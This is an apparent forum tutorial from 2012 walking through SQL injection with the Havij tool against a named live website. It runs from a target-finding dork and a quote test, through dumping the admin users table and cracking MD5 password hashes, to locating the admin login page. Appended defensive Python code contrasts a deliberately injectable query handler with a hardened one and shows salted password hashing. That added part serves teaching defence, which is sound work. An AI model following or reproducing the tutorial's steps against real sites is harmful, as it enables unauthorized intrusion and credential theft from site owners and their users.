™NOT4Shared Inside Cheaters Community™
SQL Injection Using Havij

Posted by Admin on Sat Feb 25, 2012 10:56 pm

Download the tool here: [You must be registered and logged in to see this link.]

Okay, once it's downloaded, let's go straight to the tutorial:


Use any dork.

For example, the dork: inurl:index.php?page_id=

Okay, since this tool is made in Israel, I will inject an Israeli website too!!!

Target: [You must be registered and logged in to see this link.]
Don't forget to append a ' so that it becomes [You must be registered and logged in to see this link.]

Now we run Havij; copy and paste the target from before into the Target field in Havij.

Click Analyze.

The result:

Havij 1.10 ready!
Analyzing [You must be registered and logged in to see this link.]
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia

w007s...... I Got the database... now click Tables, then click Get Tables.

w007s..... I gOt the Tables from xeniaco_xenia database..


Now, at this stage, you need to find out where the table containing the admin login information is. After looking through them, it turns out to be in the nuke_users table. Now let's look at the columns of the nuke_users table.

Tick nuke_users, then click Get Columns and wait a moment (hmmm... just 10 seconds).

w007ss.... cool.. got to check it out... I got the following columns:


Now, these are the columns of the nuke_users table, which contain the registration information, name, password, email, and mobile number of the admins of the website [You must be registered and logged in to see this link.] Now I will try to get further access to this website.. hmmmm.... I'll just tick the columns:

name
email
pass
(the other columns don't matter.. I only want to get the username and password).

Then click Get Data.

The result is as follows:
Count(*) of xeniaco_xenia.nuke_users is 3
w007s.... it turns out this website has 3 administrators...
hmmmm... the passwords are HASHed, i.e. encrypted..... no problem... Havij also has an MD5 hash cracker..

Click MD5, enter one of the HASH values, then click Start (wait a moment.... say 30 seconds). Then the result:

w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... the password was successfully cracked.. now all that's left is to find the login page.

Click Find Admin, then fill in Path to search with [You must be registered and logged in to see this link.] and click Start.... .... ............. Searching


Got that....
Page Found: [You must be registered and logged in to see this link.]

Now you just need to go to the login page, enter the username and password and....
U gained an Access

That's all ~
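What the appended ' and the `mysql_num_rows():` keyword in the log above reveal about the page handler, next to the corrected handler, as an added example that is not part of the original post. SQLite stands in for the site's MySQL, and the `pages` table and all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's database (schema is hypothetical).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (page_id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO pages VALUES (1, 'Home')")
    return db

def get_page_vulnerable(db, page_id):
    """Flawed pattern: raw input concatenated into the SQL text and the
    database error echoed to the client, which is the keyword a scanner matches."""
    try:
        row = db.execute(
            "SELECT title FROM pages WHERE page_id = " + page_id).fetchone()
    except sqlite3.Error as exc:
        return 500, "DB error: %s" % exc   # leaks parser details to the client
    return (200, row[0]) if row else (404, "Not found")

def get_page_hardened(db, page_id):
    """Fix: enforce the integer type, bind the value, never echo DB errors."""
    # isascii() rejects non-ASCII digit characters that isdigit() accepts.
    if not (page_id.isascii() and page_id.isdigit() and len(page_id) <= 9):
        return 400, "Bad request"
    try:
        row = db.execute(
            "SELECT title FROM pages WHERE page_id = ?",
            (int(page_id),)).fetchone()
    except sqlite3.Error:
        return 500, "Internal error"       # log details server-side only
    return (200, row[0]) if row else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):              # the second is the quote test above
        print(repr(value), get_page_vulnerable(db, value),
              get_page_hardened(db, value))
```
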
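In the post above, the `pass` column holds bare 32-hex MD5 values and one is recovered in about 30 seconds. The storage-side fix, as an added example that is not part of the original post: a salted, iterated hash with legacy MD5 records upgraded at the next successful login. The record format and function names are hypothetical.

```python
import hashlib
import hmac
import os
import re

ITERATIONS = 600_000                        # PBKDF2-HMAC-SHA256 work factor
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")  # shape of the values in the dump

def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<key hex>'."""
    salt = salt or os.urandom(16)           # unique per user, stored with the hash
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), key.hex())

def verify_password(password, stored):
    """Return (ok, replacement). replacement is a new record to save when a
    legacy MD5 entry verified and must be upgraded; otherwise None."""
    if LEGACY_MD5.match(stored):
        candidate = hashlib.md5(password.encode()).hexdigest()
        ok = hmac.compare_digest(candidate, stored)
        return ok, (hash_password(password) if ok else None)
    try:
        scheme, iterations, salt_hex, key_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False, None
        key = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                  bytes.fromhex(salt_hex), int(iterations))
    except ValueError:                      # malformed record
        return False, None
    return hmac.compare_digest(key.hex(), key_hex), None

if __name__ == "__main__":
    # Constructed legacy record; the password is a made-up sample value.
    legacy = hashlib.md5(b"constructed-pass").hexdigest()
    ok, upgraded = verify_password("constructed-pass", legacy)
    print(ok, upgraded)
    print(verify_password("constructed-pass", upgraded))
```
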